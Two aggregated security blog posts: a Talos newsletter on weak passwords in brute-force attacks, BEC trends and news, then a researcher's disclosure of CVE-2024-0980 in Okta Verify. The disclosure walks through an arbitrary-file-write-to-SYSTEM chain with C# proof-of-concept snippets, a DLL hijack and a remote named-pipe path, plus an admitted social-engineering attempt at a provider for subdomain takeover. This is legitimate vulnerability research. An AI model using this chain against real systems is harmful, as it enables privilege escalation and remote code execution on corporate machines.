What can we learn from the passwords used in brute-force attacks?

2 May 2024 at 18:00

Brute-force attacks are one of the most elementary cyber threats out there. Technically, anyone with a keyboard and some free time could launch one: just try a bunch of different username and password combinations on the website of your choice until you get blocked.

Nick Biasini and I discussed some of the ways that organizations can defend against brute-force attacks, since detection usually doesn’t fall into the usual buckets (e.g., there’s nothing running for an anti-virus program to detect). But a good place to start seems to be implementing strong password rules, because people, unsurprisingly, are still using some of the most obvious passwords that anyone, attacker or not, would guess.

Along with our advisory on a recent increase in brute-force attacks targeting SSH and VPN services, Cisco Talos published a list of IP addresses associated with this activity, along with a list of usernames and passwords adversaries typically try to use to gain access to a network or service.

There are some classics on this list — the ever-present “Password” password, “Passw0rd” (with a zero, not an “o”) and “123456.” This tells me that users still haven’t learned their lesson. It’s somewhat funny to think about some well-funded actor just being like, “Well, let me try to ‘hack’ into this machine by using ‘123456’” as if they’re in a parody movie, but if they can already guess a username based on someone’s real name, it’s not that unlikely that the matching password is in use somewhere.

A few other example passwords stood out to me: “Mart1x21,” because I can’t tell if this is just someone named “Martin” or a play on the month of March, and things like “Spring2024x21” and “April2024x21” because I appreciate the idea that someone using that weak of a password thinks that adding the extra three characters onto “April2024” is really going to throw an attacker off. 

Looking at this list got me thinking about what some potential solutions are to the internet’s password problem, and our ever-present battle to educate users and warn them about the dangers of using weak or default passwords. 

Going passwordless is certainly one option, because if there are no passwords to log in with, there’s nothing text-based an attacker can start guessing.

The best solution I’ve seen recently is that the U.K. literally made a law requiring hardware and software manufacturers to implement stronger security standards. The Product Security and Telecommunications Infrastructure (PSTI) Act, which went into effect last month, contains a range of security protections companies must follow, including mandatory password rules that will force users to change default passwords when registering for new accounts and stop them from using easy-to-guess passwords like “Admin” and “12345.”

It would be great if users would just stop using these credentials on their own, but if attackers are still thinking that someone out there is using “Password” as their password, they probably are.  

The one big thing 

For the first time in several quarters, business email compromise (BEC) was the most common threat in Cisco Talos Incident Response (Talos IR) engagements during the first quarter of 2024. BEC made up 46 percent of all engagements in Q1, a significant spike from Q4 2023, according to the latest Talos IR Quarterly Trends Report. Ransomware, which was the top-observed threat in the last quarter of 2023, decreased by 11 percent. Talos IR also observed a variety of threats in engagements, including data theft extortion, brute-force activity targeting VPNs, and the previously seen commodity loader Gootloader. 

Why do I care? 

BEC is a tactic adversaries use to disguise themselves as legitimate members of a business and send phishing emails to other employees or third parties, often pointing to a malicious payload or engineering a scheme to steal money. The use of email-hiding inbox rules was the top-observed defense evasion technique, accounting for 21 percent of engagements this quarter, which was likely due to an increase in BEC and phishing within engagements. These are all valuable insights from the field provided in Talos IR’s full report. 

So now what? 

There are some known indicators of compromise that customers can look for if they suspect BEC activity in their environment. The lack of MFA remains one of the biggest impediments to enterprise security. All organizations should implement some form of MFA, such as Cisco Duo. The implementation of MFA and a single sign-on system can ensure only trusted parties are accessing corporate email accounts, preventing the spread of BEC. If you’d like to read about other lessons from recent Talos IR engagements, read the one-pager here or the blog post here.

Top security headlines of the week 

The chief executive of UnitedHealth Group testified before the U.S. Congress on Wednesday regarding the recent cyber attack against Change Healthcare. Change’s operations went nearly completely dark for weeks earlier this year after a data breach, which likely resulted in millions of patients’ records and personal information being accessed. Lawmakers questioned whether UnitedHealth was too involved in the nation’s medical systems, as Change manages a third of all American patient records and processes more than 15 billion transactions a year at doctor’s offices, hospitals and other medical providers. As a result of the outage, some healthcare practitioners went more than a month without being paid, and many had to tap into their personal funds to keep offices open. UnitedHealth’s CEO told Congress the company was still working to figure out the full extent of the campaign and was talking to U.S. agencies about how best to notify individuals who were affected. The hearing also generated a conversation around consolidation in the American healthcare industry and whether some groups control too much of the patient base. (The New York Times, CNBC)

Vulnerabilities in a popular phone-tracking app could allow anyone to view all users’ locations. A security researcher recently found that iSharing, which allows users to see the exact location of a device, contained a vulnerability that prevented the app’s servers from conducting proper checks of user data access. iSharing is advertised as an app for users who want to track friends’ and family members’ locations, or as an extra layer of security if their device were to be lost or stolen. The flaws also exposed users’ names, profile pictures, email addresses and phone numbers. The researcher who discovered the vulnerability was able to show a proof-of-concept exploitation almost immediately after creating a brand-new account on the app. Representatives from the developers of iSharing told TechCrunch that the company’s logs did not show any signs of the vulnerability being exploited prior to the researcher’s disclosure. These types of apps can also be used as “stalkerware,” in which someone who knows a targeted user quietly downloads the app onto the target’s phone and then uses it to remotely track their location. (TechCrunch)

Adversaries are hiding malware in GitHub comments, disguising malicious code as URLs associated with Microsoft repositories and making the files appear trustworthy. Although some security researchers view this as a vulnerability, Microsoft maintains that it is merely a feature of using GitHub. While adversaries have so far mainly abused this feature to mirror Microsoft URLs, it could theoretically be used to create convincing lures on any GitHub repository. When a user leaves a comment in GitHub, they can attach a file, which is then uploaded to GitHub’s CDN and associated with the related project using a unique URL. GitHub automatically generates the link to download that attachment after adding the file to an unsaved comment, allowing threat actors to attach malware to any repository without the administrators knowing. This method has already been abused to distribute the Redline information-stealing trojan by attaching comments to Microsoft’s GitHub-hosted repositories for “vcpkg” and “STL.” The malicious URL will still work even if the poster deletes the comment, allowing them to reuse the GitHub-generated URL. (Bleeping Computer, Dark Reading)

Can’t get enough Talos? 

 

Upcoming events where you can find Talos

RSA (May 6 - 9) 

San Francisco, California    

ISC2 SECURE Europe (May 29) 

Amsterdam, Netherlands 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the European Cybersecurity Skills Framework (ECSF) and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.

Cisco Live (June 2 - 6) 

Las Vegas, Nevada  

Most prevalent malware files from Talos telemetry over the past week 

This section will be on a brief hiatus while we work through some technical difficulties. 

Okta Verify for Windows Remote Code Execution – CVE-2024-0980

By: b0yd
2 May 2024 at 17:41

This article is in no way affiliated with, sponsored, or endorsed by Okta, Inc. All graphics are being displayed under fair use for the purposes of this article.

Poppin shells with Okta Verify on Windows

These days I rarely have an opportunity to do bug hunting. Fortunately, over the holiday break, I found some free time. This started as it usually does, with me looking at what software was running on my computer.

A while back I had installed Okta Verify on my Windows box, as it was required for some “enhanced” 2FA I needed to access a thing. Months later, it sat there doing whatever it does. I googled to see if Okta had a bug bounty program because, even though I had some time, it’d be nice to get paid if I found a thing. I was thrilled to find that Okta has a bug bounty with Bugcrowd, that Okta Verify is in scope, and that the payouts look good, almost too good.

I started with my usual bug hunting flow when approaching a random Windows service. This typically includes looking for the usual low-hanging fruit. A good article for the types of things to look for can be found here.

Firing up Sysinternals Procmon, I saw there is a service called Okta.Coordinator.Service running as SYSTEM. Without going into the details (namely because Okta hasn’t fixed it or issued it a CVE), I found a thing. I submitted the report and was promptly paid.

Well, that’s weird. The bug I submitted is an unequivocal 7.8 CVSS, which, without knowing the voodoo behind P ratings (P1-P4), seems like it would be a P2 at least. Instead, I got a P3 and was paid out at the lower end.

Looking back on it, I’m betting this is probably an old bug bounty program trick to motivate researchers to dig deeper… because it worked. I decided to take a closer look since I hadn’t even opened up the binary to see what it was doing – and I wanted to get that big payout.

Let’s Get Crackin’

I haven’t popped Okta.Coordinator.Service.exe into a disassembler yet, but I’m betting it’s a .NET application. My guess comes from its name and the fact that there’s an Okta.Coordinator.Service.exe.config file right there with it, which you usually see with .NET applications.

When I open up the executable in JetBrains dotPeek, I can confirm it is indeed a .NET application. The binary appears to be a service wrapper. It handles the service-related functionality: install, uninstall, start, stop, etc. It references an Okta.AutoUpdate.Executor class that just so happens to have a matching DLL in the same directory.

Moving on to the DLL in dotPeek, I found the code used by the service. The first thing I noticed was that it sets up a named pipe server, which listens for commands to update the Okta Verify software. This is a common design paradigm in Windows for enabling low-privileged applications to communicate with a high-privileged service to perform updates, as these often require elevated privileges. It’s a complex mechanism that’s tricky to do right, and often a good place for finding bugs. I was able to confirm the existence of the named pipe server with a little PowerShell.
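The same check can be sketched in C# (the “okta” filter is a guess on my part, since the exact pipe name isn’t spelled out here): the named pipe namespace can simply be enumerated like a directory.

```csharp
using System;
using System.IO;

class PipeList
{
    static void Main()
    {
        // The named pipe namespace can be enumerated like a directory,
        // listing every pipe currently open on the machine.
        foreach (string pipe in Directory.GetFiles(@"\\.\pipe\"))
        {
            // Filter on the vendor name; the exact pipe name is a guess.
            if (pipe.IndexOf("okta", StringComparison.OrdinalIgnoreCase) >= 0)
                Console.WriteLine(pipe);
        }
    }
}
```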

Next, I investigated how to initiate an update and what aspects of this process could be manipulated by an attacker. The handler for the named pipe processes a straightforward JSON message that includes several fields, some checked against expected values. The primary field of interest is the update URL. If the input data passes validation, the software will attempt to fetch details from the specified URL about the most recent update package available. As shown below, the URL (sub)domain is verified against a whitelist before proceeding. For now, I’ll avoid trying to meet/bypass this requirement and simply add an entry in the hosts file on my test machine.
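For illustration, the trigger message is JSON along these lines. The field names are mine, not the real schema, and I’m assuming for the sketch that okta.com subdomains pass the whitelist:

```json
{
  "product": "OktaVerify",
  "channel": "stable",
  "updateUrl": "https://updates.example.okta.com/manifest.json"
}
```

A hosts entry like “192.0.2.10 updates.example.okta.com” then points that hostname at a web server I control.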

Typically at this stage, I’d code up a proof of concept (POC) to send a JSON message to the named pipe and check if the software connected to a web server I control. But since I hadn’t spotted any potential vulnerabilities yet, I skipped that step and moved on.

From here, I took a look at the code responsible for processing the JSON message retrieved from the attacker-controlled update server. The application expects a message that contains metadata about an update package, including versioning and an array of file metadata objects. These objects contain several pertinent fields such as the download URL, size, hash, type, and command line arguments. The provided download URL is validated with the same domain-checking algorithm as before. If the check passes, the software downloads the file and writes it to disk. This is where things get interesting. The code parses the download URL from the received metadata and constructs the file path by calling the Path.Combine function.
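Based on that description, the manifest the service fetches looks something like the sketch below (again, illustrative field names rather than the actual schema):

```json
{
  "version": "9.9.9",
  "files": [
    {
      "url": "https://updates.example.okta.com/OktaVerifySetup.exe",
      "size": 12345678,
      "hash": "<sha256-of-file>",
      "type": "EXE",
      "arguments": "/quiet"
    }
  ]
}
```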

Several factors converge here to create a serious vulnerability. The most obvious is the use of the Path.Combine function with user-supplied data. I went into depth about this issue in a previous blog post here. The TLDR is that if a full path is provided as the second argument to this function, the first argument, which typically specifies the parent folder, is ignored. The next issue is how the filename is parsed. The code splits the file location URL by forward slash and takes the last element as the filename. The problem (solution) is that a full Windows path can be inserted here using backslashes and it’s still a valid URL. Since the service is running as SYSTEM, we have permissions to write anywhere. If we put all this together, our payload looks something like the script below.

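In C# terms (variable names and the target path are mine, not the decompiled code), the core of the trick is:

```csharp
using System;
using System.IO;

class PayloadPathDemo
{
    static void Main()
    {
        // The "url" field in our malicious manifest: its last '/'-separated
        // segment is a fully qualified Windows path. Backslashes don't
        // invalidate the URL.
        string downloadUrl =
            @"https://updates.example.okta.com/C:\Windows\Temp\poc.txt";

        // Mirrors the service's filename parsing: split on '/' and take
        // the last element.
        string[] segments = downloadUrl.Split('/');
        string fileName = segments[segments.Length - 1];
        // fileName == @"C:\Windows\Temp\poc.txt" -- a rooted path.

        // Path.Combine discards its first argument when the second one is
        // rooted, so the service's intended download directory is ignored
        // and the SYSTEM service writes wherever the URL says.
        string intendedDir = @"C:\ProgramData\Okta\UpdateService";  // illustrative
        Console.WriteLine(Path.Combine(intendedDir, fileName));
        // Prints: C:\Windows\Temp\poc.txt
    }
}
```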

Now that I have a potential bug to test out, I craft the POC for the named pipe client to trigger the update. Luckily, this code already exists in the .NET DLL for me to repurpose. With my web server code also in place, I send the request to test out the file write. As I had hoped, the file write succeeds!
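In outline, the client side is little more than a NamedPipeClientStream; the pipe name and JSON fields below are the same placeholders as before, not the real values from the decompiled DLL:

```csharp
using System;
using System.IO.Pipes;
using System.Text;

class UpdateTrigger
{
    static void Main()
    {
        // Placeholder pipe name; the real one comes from the decompiled DLL.
        using var pipe = new NamedPipeClientStream(
            ".", "OktaUpdaterPipe", PipeDirection.InOut);
        pipe.Connect(timeout: 5000);

        // Trigger message pointing the service at our update server
        // (reachable thanks to the hosts-file entry).
        byte[] message = Encoding.UTF8.GetBytes(
            "{\"updateUrl\":\"https://updates.example.okta.com/manifest.json\"}");
        pipe.Write(message, 0, message.Length);

        // Read back whatever the service answers, if anything.
        byte[] buffer = new byte[4096];
        int read = pipe.Read(buffer, 0, buffer.Length);
        Console.WriteLine(Encoding.UTF8.GetString(buffer, 0, read));
    }
}
```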

Cool, but what about impact!

I have the ability to write arbitrary files as SYSTEM on Windows. How can I leverage this to achieve on-demand code execution? The first thing that comes to mind is some form of DLL hijacking. I’ve used phantom DLL hijacking in the past, but this is more appropriate for red team operations where time constraints aren’t really an issue. What I really need is the ability to force execution shortly after the file write.

Since the whole purpose behind this service is to install an update, can I just use it to execute my code? I reviewed the code after the file write to see what it takes to execute the downloaded update package. It appears the file type field in the file object metadata is used to indicate which file to execute. If the EXE or MSI file type is set, the application will attempt to validate the file’s signature before executing it, along with any supplied arguments. The process launcher executes the binary with UseShellExecute set to false, so there’s no possibility of command injection.

My original thought was to deliver a legitimate Okta Verify package, since this would pass the signature check. I could then use ProcMon to identify a DLL hijack in the install package. Privileged DLL hijacks exist in almost all services, because the assumption is that you would already need permissions to write to a privileged location in order to exploit them. Ironically though, I found the service binary itself contained a DLL hijack just prior to the signature verification, to load the necessary cryptographic libraries. If I write a DLL to C:\Program Files (x86)\Okta\UpdateService\wintrust.dll, it will get loaded just prior to signature verification.
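The mechanics, roughly: Authenticode checks ultimately call into wintrust.dll (for example via the WinVerifyTrust API), and a P/Invoke like the generic sketch below is resolved through LoadLibrary’s search order, which tries the application directory before System32. This is an illustration of the pattern, not Okta’s decompiled code:

```csharp
using System;
using System.Runtime.InteropServices;

class AuthenticodeCheck
{
    // When this P/Invoke is first used, Windows resolves "wintrust.dll"
    // through the standard DLL search order. The application directory
    // (here C:\Program Files (x86)\Okta\UpdateService\) is searched before
    // System32, so a planted wintrust.dll there gets loaded instead.
    [DllImport("wintrust.dll", ExactSpelling = true)]
    public static extern int WinVerifyTrust(
        IntPtr hwnd, ref Guid pgActionID, IntPtr pWVTData);
}
```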

Great, so now I have a way to execute arbitrary code from an unprivileged user to SYSTEM. “Guessing” that this probably won’t meet the bar of P1 or P2, I start thinking of how to upgrade this to remote code execution. If RCE doesn’t get a P1, then what does? The interesting thing about named pipes is that they are often remotely accessible; it all depends on what permissions are set. Looking at the code below, it grants full control to the “BUILTIN\Users” group.
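Reconstructed as a sketch (placeholder pipe name; the .NET Framework NamedPipeServerStream constructor accepts the ACL directly), the pattern is:

```csharp
using System.IO.Pipes;
using System.Security.AccessControl;
using System.Security.Principal;

class ServerSetup
{
    static NamedPipeServerStream Create()
    {
        // Grant full control on the pipe to the BUILTIN\Users group.
        var security = new PipeSecurity();
        security.AddAccessRule(new PipeAccessRule(
            new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, null),
            PipeAccessRights.FullControl,
            AccessControlType.Allow));

        // .NET Framework overload that accepts a PipeSecurity directly.
        return new NamedPipeServerStream(
            "OktaUpdaterPipe",                       // placeholder name
            PipeDirection.InOut,
            NamedPipeServerStream.MaxAllowedServerInstances,
            PipeTransmissionMode.Message,
            PipeOptions.Asynchronous,
            0, 0,                                    // default buffer sizes
            security);
    }
}
```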

Testing from a remote system in my network confirms that I get permission denied when I try to connect to the named pipe. After a couple of days, I had an idea. If a Windows system is part of an Active Directory domain, do the BUILTIN\Users group permissions automatically extend to the “Domain Users” group? This would mean any user in an AD domain could remotely execute code on any system that has Okta Verify installed. Moreover, considering that this software is aimed at large corporate enterprises, it would likely be included in the standard build and deployed broadly. So not explicitly “Domain Admin,” but a good chance of it. I had to find out, so I stood up a test AD network in AWS, and the following video shows what happened.

Almost done

Well, that seems like a big deal, right? Maybe get a P1 (and 70k…)? I’m guessing the small detail about not having an Okta subdomain to download from may keep it from landing a P1. Having worked at big tech companies, I know that subdomain takeover reports are common. However, without a subdomain takeover, it’s likely the bug’s significance would be minimized. I decided to dedicate some time to searching for one to complete the exploit chain. After going through the standard bug bounty subdomain takeover tools, I came up with only one viable candidate: oktahelpspot.okta.com. It pointed to an IP with no open ports, managed by a small VPS provider named Arcustech.

After signing up for an account and some very innocent social engineering, I got the following response. And then a second email from the first person’s manager. Oh well, so much for that.

The next thing that came to mind was leveraging a custom Okta client subdomain. Whenever a new client registers with Okta, they receive a personalized Okta subdomain to manage their identity providers, e.g., trial-XXXXXXX.customdomains.okta.com. I found a way to set custom routes in the web management application that would redirect traffic from your custom domain to a user-defined URL. Unfortunately, this redirect was implemented in JavaScript rather than through a conventional 301 or 302 HTTP redirect. Consequently, the .NET HTTP client that the Okta Verify update service uses did not execute the JavaScript and therefore did not follow the redirect as a browser would.

Reporting

At this point, I decided it was time to report my findings to Okta. Namely, because they were offering a bonus at the time for what appeared to be Okta Verify, which I think they might have either forgotten about or included without mentioning. Secondly, I didn’t want to risk someone else beating me to it. I am happy to report they accepted the report and awarded me a generous bounty of $13,337 as a P2. It wasn’t quite $70k, or a P1, but it’s nothing to sneeze at. I want to thank Okta for the bounty and quick resolution. They also kindly gave me permission to write this blog post and followed through with issuing CVE-2024-0980 along with an advisory.

One last note: if anyone reading this identifies a way to bypass the subdomain validation check, I would be very interested. I attempted most of the common URL-parsing confusion techniques, as well as various encoding tricks, all for naught. Drop me a line at @rwincey on X.
